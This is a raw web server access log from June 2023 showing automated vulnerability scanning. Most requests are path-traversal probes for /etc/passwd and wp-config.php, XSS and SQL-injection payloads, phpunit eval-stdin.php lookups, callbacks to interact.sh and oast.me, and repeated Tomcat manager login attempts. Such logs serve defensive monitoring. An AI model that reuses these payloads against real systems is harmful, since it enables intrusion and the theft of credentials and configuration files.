107.189.31.184 - - [17/Jun/2023:16:37:58 +0530] "GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:16:37:59 +0530] "GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:16:38:00 +0530] "GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:16:38:12 +0530] "GET /index.html HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:16:38:12 +0530] "GET /index.html HTTP/1.1" 404 1014
41.186.73.134 - - [17/Jun/2023:16:38:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:39:35 +0530] "GET /awstats/awredir.pl?url=interact.sh HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:16:39:35 +0530] "GET /awstats/awredir.pl?url=interact.sh HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:16:39:37 +0530] "GET /cgi-bin/awstats/awredir.pl?url=interact.sh HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:16:39:38 +0530] "GET /cgi-bin/awstats/awredir.pl?url=interact.sh HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:16:41:10 +0530] "GET /wp-content/plugins/count-per-day/download.php?f=/etc/passwd&n=1 HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:16:41:11 +0530] "GET /wp-content/plugins/count-per-day/download.php?f=/etc/passwd&n=1 HTTP/1.1" 404 1084
41.186.73.134 - - [17/Jun/2023:16:42:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:16:43:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:44:41 +0530] "GET /api/snapshots/:key HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:16:44:42 +0530] "GET /api/snapshots/:key HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:16:45:06 +0530] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 1078
107.189.31.184 - - [17/Jun/2023:16:45:07 +0530] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 1078
107.189.31.184 - - [17/Jun/2023:16:45:08 +0530] "GET /upload/userfiles/image/2RHotvcLc7d9FpaaNMELTU9FRye.png HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:16:45:09 +0530] "GET /upload/userfiles/image/2RHotvcLc7d9FpaaNMELTU9FRye.png HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:16:46:17 +0530] "GET /index.php/Pan/ShareUrl/downloadSharedFile?file_name=win.ini&true_path=../../../../../../windows/win.ini HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:16:46:18 +0530] "GET /index.php/Pan/ShareUrl/downloadSharedFile?file_name=win.ini&true_path=../../../../../../windows/win.ini HTTP/1.1" 404 1076
41.186.73.134 - - [17/Jun/2023:16:46:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:16:47:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
35.203.210.99 - - [17/Jun/2023:16:47:44 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:16:49:24 +0530] "GET ///////../../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:49:24 +0530] "GET ///////../../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:49:26 +0530] "GET /static///////../../../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:49:26 +0530] "GET /static///////../../../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:49:28 +0530] "GET ///../app.js HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:49:28 +0530] "GET ///../app.js HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:50:29 +0530] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:16:50:30 +0530] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 1060
41.186.73.134 - - [17/Jun/2023:16:50:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:51:40 +0530] "POST /mailingupgrade.php HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:16:51:40 +0530] "POST /mailingupgrade.php HTTP/1.1" 404 1030
41.186.73.134 - - [17/Jun/2023:16:51:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
184.105.247.196 - - [17/Jun/2023:16:52:30 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:16:52:33 +0530] "GET /jeecg-boot/sys/user/querySysUser?username=admin HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:16:52:33 +0530] "GET /jeecg-boot/sys/user/querySysUser?username=admin HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:16:53:13 +0530] "POST /conf_mail.php HTTP/1.1" 404 1020
184.105.247.208 - - [17/Jun/2023:16:53:14 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
107.189.31.184 - - [17/Jun/2023:16:53:15 +0530] "POST /conf_mail.php HTTP/1.1" 404 1020
184.105.247.232 - - [17/Jun/2023:16:53:38 +0530] "GET /?format=json HTTP/1.1" 200 11250
184.105.247.224 - - [17/Jun/2023:16:54:06 +0530] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:16:54:29 +0530] "GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:16:54:30 +0530] "GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1" 404 1042
41.186.73.134 - - [17/Jun/2023:16:55:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:16:55:04 +0530] "GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:16:55:05 +0530] "GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1030
41.186.73.134 - - [17/Jun/2023:16:56:14 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:16:59:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:17:00:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:02:22 +0530] "POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:17:02:23 +0530] "POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:17:02:24 +0530] "GET /logo/2RHotnYfyRemhYR3zwBDaA9GAXY.txt HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:17:02:25 +0530] "GET /logo/2RHotnYfyRemhYR3zwBDaA9GAXY.txt HTTP/1.1" 404 1066
41.186.73.134 - - [17/Jun/2023:17:03:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:03:42 +0530] "GET /phpwiki/index.php/passwd HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:17:03:43 +0530] "GET /phpwiki/index.php/passwd HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:17:03:56 +0530] "POST /admin/index.php HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:17:03:57 +0530] "POST /admin/index.php HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:17:04:26 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_zimbcomment HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:04:27 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_zimbcomment HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:17:04:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:17:08:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:17:09:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:11:36 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:17:11:38 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:17:11:39 +0530] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:17:11:40 +0530] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:17:11:41 +0530] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1110
107.189.31.184 - - [17/Jun/2023:17:11:42 +0530] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1110
107.189.31.184 - - [17/Jun/2023:17:11:43 +0530] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1114
107.189.31.184 - - [17/Jun/2023:17:11:44 +0530] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1114
107.189.31.184 - - [17/Jun/2023:17:11:45 +0530] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:17:11:47 +0530] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:17:11:48 +0530] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1104
107.189.31.184 - - [17/Jun/2023:17:11:49 +0530] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1104
198.144.159.126 - - [17/Jun/2023:17:11:55 +0530] "CONNECT cn.bing.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:17:12:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:12:37 +0530] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:17:12:39 +0530] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:17:12:39 +0530] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:17:12:41 +0530] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 1046
41.186.73.134 - - [17/Jun/2023:17:13:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:14:04 +0530] "POST /login.cgi HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:14:04 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:17:14:05 +0530] "POST /login.cgi HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:14:05 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:17:14:27 +0530] "GET /files.md5 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:14:28 +0530] "GET /files.md5 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:14:29 +0530] "GET /testrail/files.md5 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:17:14:30 +0530] "GET /testrail/files.md5 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:17:15:41 +0530] "GET /?item_id=0%20union%20select%20sleep(5)%20--%20g&rest_route=/wc/v3/wishlist/remove_product/1 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:17:15:41 +0530] "GET /?item_id=0%20union%20select%20sleep(5)%20--%20g&rest_route=/wc/v3/wishlist/remove_product/1 HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:17:16:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
59.178.208.64 - - [17/Jun/2023:17:16:25 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:17:17:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:17:17:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:29 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:37 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:48 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:17:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:18:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:18:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:18:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:18:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:18:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:20:19 +0530] "GET /users/sign_in HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:17:20:20 +0530] "GET /users/sign_in HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:17:20:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:20:43 +0530] "POST /api/users HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:20:44 +0530] "POST /api/users HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:21:18 +0530] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:17:21:18 +0530] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:17:21:23 +0530] "GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1" 404 1074
107.189.31.184 - - [17/Jun/2023:17:21:23 +0530] "GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1" 404 1074
41.186.73.134 - - [17/Jun/2023:17:21:48 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.108 - - [17/Jun/2023:17:23:18 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:17:23:18 +0530] "GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:23:18 +0530] "GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1012
90.151.171.108 - - [17/Jun/2023:17:23:18 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:17:23:23 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:17:23:23 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:17:23:29 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.108 - - [17/Jun/2023:17:23:33 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:17:23:33 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:17:23:34 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:17:24:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:17:25:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:17:29:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:29:28 +0530] "GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1" 404 1124
107.189.31.184 - - [17/Jun/2023:17:29:28 +0530] "GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1" 404 1124
107.189.31.184 - - [17/Jun/2023:17:29:52 +0530] "GET /wp-admin?piereg_logout_url=true&redirect_to=https://oast.me HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:17:29:53 +0530] "GET /wp-admin?piereg_logout_url=true&redirect_to=https://oast.me HTTP/1.1" 404 1010
41.186.73.134 - - [17/Jun/2023:17:30:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:33:29 +0530] "GET /plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:17:33:30 +0530] "GET /plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1056
41.186.73.134 - - [17/Jun/2023:17:33:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:34:28 +0530] "GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1" 404 1108
107.189.31.184 - - [17/Jun/2023:17:34:29 +0530] "GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1" 404 1108
41.186.73.134 - - [17/Jun/2023:17:34:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:35:02 +0530] "GET /?a=display&templateFile=README.md HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:17:35:03 +0530] "GET /?a=display&templateFile=README.md HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:17:35:44 +0530] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:17:35:44 +0530] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 1034
41.186.73.134 - - [17/Jun/2023:17:38:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:38:17 +0530] "POST /index.php?controller=editlieux&option=com_gmapfp&task=upload_image&tmpl=component HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:38:19 +0530] "POST /index.php?controller=editlieux&option=com_gmapfp&task=upload_image&tmpl=component HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:38:19 +0530] "POST /index.php?controller=editlieux&option=comgmapfp&task=upload_image&tmpl=component HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:38:21 +0530] "POST /index.php?controller=editlieux&option=comgmapfp&task=upload_image&tmpl=component HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:38:31 +0530] "GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:17:38:32 +0530] "GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:17:38:41 +0530] "GET /cluster/cluster HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:17:38:42 +0530] "GET /cluster/cluster HTTP/1.1" 404 1024
41.186.73.134 - - [17/Jun/2023:17:39:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:41:07 +0530] "GET /secret_token.rb HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:17:41:07 +0530] "GET /secret_token.rb HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:17:41:09 +0530] "GET /config/initializers/secret_token.rb HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:17:41:09 +0530] "GET /config/initializers/secret_token.rb HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:17:41:11 +0530] "GET /redmine/config/initializers/secret_token.rb HTTP/1.1" 404 1080
107.189.31.184 - - [17/Jun/2023:17:41:11 +0530] "GET /redmine/config/initializers/secret_token.rb HTTP/1.1" 404 1080
41.186.73.134 - - [17/Jun/2023:17:42:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
167.94.138.127 - - [17/Jun/2023:17:42:54 +0530] "GET / HTTP/1.1" 200 11250
167.94.138.127 - - [17/Jun/2023:17:42:55 +0530] "GET / HTTP/1.1" 200 11250
167.94.138.127 - - [17/Jun/2023:17:42:55 +0530] "PRI * HTTP/2.0" 505 -
167.94.138.127 - - [17/Jun/2023:17:42:56 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
41.186.73.134 - - [17/Jun/2023:17:43:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
45.128.232.141 - - [17/Jun/2023:17:45:06 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:17:46:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:47:42 +0530] "GET /index.php?id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&lvl=author_see HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:47:42 +0530] "GET /index.php?id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&lvl=author_see HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:17:47:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:48:46 +0530] "GET /npm-debug.log HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:17:48:46 +0530] "GET /npm-debug.log HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:17:48:47 +0530] "GET /assets/npm-debug.log HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:17:48:48 +0530] "GET /assets/npm-debug.log HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:17:49:01 +0530] "POST /account/index.php HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:17:49:01 +0530] "POST /account/index.php HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:17:49:02 +0530] "POST /opensis/index.php HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:17:49:04 +0530] "POST /opensis/index.php HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:17:49:04 +0530] "POST /index.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:49:05 +0530] "POST /index.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:17:50:51 +0530] "GET /crx/explorer/nodetypes/index.jsp HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:17:50:52 +0530] "GET /crx/explorer/nodetypes/index.jsp HTTP/1.1" 404 1058
41.186.73.134 - - [17/Jun/2023:17:51:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:17:52:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:52:53 +0530] "GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:17:52:53 +0530] "GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:17:53:41 +0530] "POST /ocpu/library/base/R/do.call/json HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:17:53:41 +0530] "POST /ocpu/library/base/R/do.call/json HTTP/1.1" 404 1058
41.186.73.134 - - [17/Jun/2023:17:55:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
78.108.177.52 - - [17/Jun/2023:17:55:56 +0530] "GET / HTTP/1.0" 200 11230
41.186.73.134 - - [17/Jun/2023:17:56:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:17:56:28 +0530] "GET /?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:17:56:29 +0530] "GET /?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:17:58:22 +0530] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:17:58:22 +0530] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:17:58:23 +0530] "GET / HTTP/1.1" 200 11250
